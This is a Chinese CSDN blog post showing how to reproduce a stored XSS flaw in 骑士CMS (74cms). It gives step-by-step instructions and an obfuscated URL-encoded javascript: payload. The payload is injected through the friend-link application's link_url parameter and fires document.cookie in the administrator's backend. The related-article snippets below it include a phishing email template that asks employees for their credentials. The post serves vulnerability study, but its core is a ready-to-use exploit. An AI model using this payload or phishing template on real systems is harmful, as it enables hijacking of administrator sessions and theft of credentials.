骑士CMS存储型XSS(攻击管理员)

最新推荐文章于 2024-03-04 09:29:38 发布
最新推荐文章于 2024-03-04 09:29:38 发布
阅读量340 收藏
点赞数
分类专栏: 杂七杂八 文章标签: xss java 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuguojiuai/article/details/127608149
版权
本文详细介绍了骑士CMS中存在的一处存储型XSS漏洞,通过注册企业号并上传营业执照图片,构造特定Payload,能够在后台的友情链接模块触发XSS攻击,威胁管理员安全。
摘要由CSDN通过智能技术生成

原文地址:骑士cms漏洞

00×0

测试环境:

Windows + PHPstudy

参考文章:

http://www.nmap.cc/jsjl/112.html

00×1

漏洞证明:

首先先注册一个企业号 完整公司基本信息 在上传一张营业执照图片

复制图片地址构造payload
如图片地址
upload/data/certificate/2018/06/13/1528874681152.png

Payload:

http%3A%2F%2Fwww.test.com%22%3E%3C%0Ba%0B+class="admin_%26%23102%3Brameset"+href%3Dja%26%23118%3Basc%26%23114%3Bipt%3Aale%26%23114t%28document.cookie%29%0B%3E%3C%0Bimg%0B+src%3D%2Fupload%2Fdata%2Fcertificate%2F2018%2F06%2F13%2F1528874681152.png%0B%3E%3C%0B%2Fa%0B%3E%3C%0Bb+a%3D%22

点击首页下面的 申请友情链接 抓包 把构造好的payload填写到link_url参数下

提交成功后

登录后台-广告-友情链接

就会出现我们上传的图片,点击图片会弹出cookie

小韩韩啊
关注
专栏目录
怎么修复网站漏洞 骑士cms的漏洞修复方案
网站安全专家
01-03 808
骑士CMS是国内公司开发的一套开源人才网站系统,使用PHP语言开发以及mysql数据库的架构,2019年1月份被某安全组织检测出漏洞,目前最新版本4.2存在高危网站漏洞,通杀SQL注入漏洞,利用该网站漏洞可以获取网站的管理员账号密码以及用户账号信息. 目前很多人才网站都使用的骑士CMS系统,受影响的网站较多,关于该网站漏洞的详情我们来详细的分析一下。骑士cms4.2最新版本使用了thinkphp...
渗透测试php过程,利用骑士cms的一次纠结的渗透测试过程(两个潜在
weixin_39772352的博客
04-09 562
今天下载了骑士cms的最新版本,由于好久以前一个哥们发了一个后台拿shell的漏洞,还有别人发的一个sql注入的漏洞,一个有意思的渗透测试过程就从这两个地方开始了,成功的拿下了某大人才网站的服务器,过程算比较艰辛吧,由于附带了对其实cms的漏洞重新分析,并且加入了自己新的利用方法,所以这里提交到了通用漏洞第一步 我们分析一个老的sql注入问题:文件job/plus/ajax_common.php...
针对骑士cms的反射xss漏洞
最新发布
qq_67240733的博客
03-04 745
针对骑士cms的反射xss漏洞攻击
骑士CMS文件包含+getshell漏洞复现(python自动化验证扫描漏洞)
走在搬砖的路上!
08-02 3445
简介 骑士cms人才系统,是一项基于PHP+MYSQL为核心开发的一套免费 +开源专业人才网站系统 公告地址: http://www.74cms.com/news/show-2497.html /Application/Common/Controller/BaseController.class.php文件的assign_resume_tpl函数因为过滤不严格,导致了模板注入,可以进行远程命令执行 影响版本 骑士 CMS < 6.0.48 环境搭建 这里使用phpstudy进.
PHP代码审计基础篇(XSS 漏洞)
qq_45521281的博客
05-20 1320
XSS 漏洞 XSS学名为跨站脚本攻击( Cross Site Scriptings),在Web漏洞中XSS是出现最多的漏洞,没有之一。这种漏洞有两种情况,一种是通过外部输入然后直接在浏览器端触发,即反射XSS;还有一种则是先把利用代码保存在数据库或文件中,当Web程序读取利用代码并输出在页面上时触发漏洞,也就是存储XSSXSS攻击在浏览器端触发,大家对其危害认识往往停留在可以窃取cookie、修改页面钓鱼,等等。用一句话来说明该漏洞的危害就是:前端页面能做的事它都能做。 挖掘经验 挖掘XSS漏洞的关
基于PHP的骑士CMS PHP人才系统源码(74cms) 正式版.zip
08-26
骑士CMS可能实现了角色基础的权限控制,如管理员、招聘者和求职者的不同权限设定。 7. **API接口**:现代Web应用往往需要与其他服务或系统集成,骑士CMS可能提供了API接口,允许外部程序或服务与之交互,例如同步...
骑士cms人才系统74cms免费正式版.zip
01-25
2. MySQL数据库支持:骑士CMS很可能依赖于MySQL作为数据库管理系统,MySQL是世界上最流行的关系数据库,以其高效、稳定和开源特性被广泛应用于Web应用中。用户数据存储、查询和管理都将在MySQL中进行。 3. MVC...
74cms 骑士人才系统 v4.2.66 正式版
12-30
- **安全防护**:系统内置防止SQL注入、XSS攻击等安全措施,保护用户数据安全。 - **更新与维护**:v4.2.66正式版意味着经过多次迭代优化,具备良好的稳定性和兼容性,且官方会定期发布更新和修复,保障系统的长期...
PHP实例开发源码——骑士cms人才系统74cms免费正式版.zip
11-25
这个压缩包提供的“骑士cms人才系统74cms免费正式版”是基于PHP实现的一款内容管理系统(CMS),专为构建人才招聘网站而设计。通过这份源码,开发者可以深入理解PHP在实际项目中的应用,学习如何搭建、管理和维护一...
74CMS 3.4 反射XSS漏洞
浅笑996的博客
12-26 1633
一、 启动环境 1.双击运行桌面phpstudy.exe软件 2.点击启动按钮,启动服务器环境 二、代码审计 1.双击启动桌面Seay源代码审计系统软件 2.因为74CMS3.4源代码编辑使用GBK编辑,所以首先需要先将编码改成GBK 3.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\74cms),点击确定 漏洞分析 1.点击展开左侧templates\default目...
【漏洞学习——XSS】bagecms存储xss可叉后台
Fly_鹏程万里
02-22 1304
漏洞细节 0x0A 前面发现留言板的过滤已经做的很好了,现在来说一个可以直接拿到管理员并且在后台修改php模板 getshell 的方法0x0B 首先我们来到了他的后台 0x0C 输入一串神奇的 xss  0x0D 登陆后台可以查看到,整个已经变形了,也就是说 logger 没有对 log 进行过滤记录,导致了存储 XSS 。 0x0E 我们来看看这一项的代码 修复方案...
代码审计-74CMS-XSS-添加简历
王嘟嘟的博客
10-25 950
0x00 前言 如饥似渴的学习ing。 主要是学习了代码审计想找一些cms进行练手但是相对来说,难度还是很大的。 所以我们这里主要是对乌云上出现的一些漏洞进行复现,对漏洞进行一个总结,然后看能不能学到一些东西。 版本 74cms 3.4 其他 我在74cms 3.1 版本上测试,是不存在这个漏洞的,我不知道是不是过滤规则被修改了还是怎么了。为什么版本越后,反而越不行了。所以之后会写一篇博客进行对比...
74cms|骑士cms|开源招聘系统,目录结构
beyond__devil的博客
10-23 6030
很不幸,我这几天,看了看3.7系统,前天刚出了4.0的测试版,点开一看,彻底重构了,用ThinkPHP,不过相信大体上不会变太多,这里是3.7版本: 74cms3.7目录结构:     install - 安装     // 核心目录     data - 数据库配置,后台一些配置缓存,session存储,图片,word简历,证书等保存目录     admin - 后台目录
元宇宙(Metaverse)安全策略及问题思考
课嗨教育的专栏
02-02 9295
在过去的一年里,元宇宙的概念一直是科技人士讨论的热门话题,既然是一个新技术的诞生,那么避免不了过程中可能会出现的一些安全问题。
20年时候收集的一些信息安全岗面试题
课嗨教育的专栏
05-02 7731
目录 面试一 面试二 面试三 更多资料可:渗透测试基础课-课程进度_课嗨教育的博客-CSDN博客 面试一 个人介绍: 自我介绍要点:不要用长逻辑句,短小精悍 控制在3-4分钟 1、自我介绍姓名年龄哪里人学校情况不是重点,作为顺滑开场 2、经历与技能啥时候开始学web攻防,实习经历(神舟,做了什么;尚然,做了什么),让人家清楚历史引入技术主题,挑重点 3、业绩/成绩: 研究类:freebuff SRC I春秋...
内存马的简单认识
课嗨教育的专栏
04-26 5314
111
mimikatz使用方法
课嗨教育的专栏
04-23 3829
0x00 简介 Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe进程中获取当前登录系统用户名的密码, lsass 是微软 Windows 系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass 内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对 lsass 逆算获取.
红蓝对抗-钓鱼邮件模板一
课嗨教育的专栏
05-04 3564
邮件标题: 更新(OA)系统通知!望各大领导及同事配合! 邮件原文: 各位领导及同事: 公司办公自动化(OA)系统自运行以来,已不断优化完善。为提高办公效率,实现无纸化办公,公司将全面推进办公自动化(OA)系统的使用, 公司企业邮箱系统计划于即日起开始进行迁移升级,在此之前,请您务必配合做好以下工作: 现将相关事项通知如下: 在收到邮件的第一时间。将下列信息填写完毕回复到: admin@xxx.com 姓名:[必填] 职位:[必填] 编号:[必填] 邮箱:[必填] 密码: [必填] 原始.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小韩韩啊

你的鼓励是对我最大的支持

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值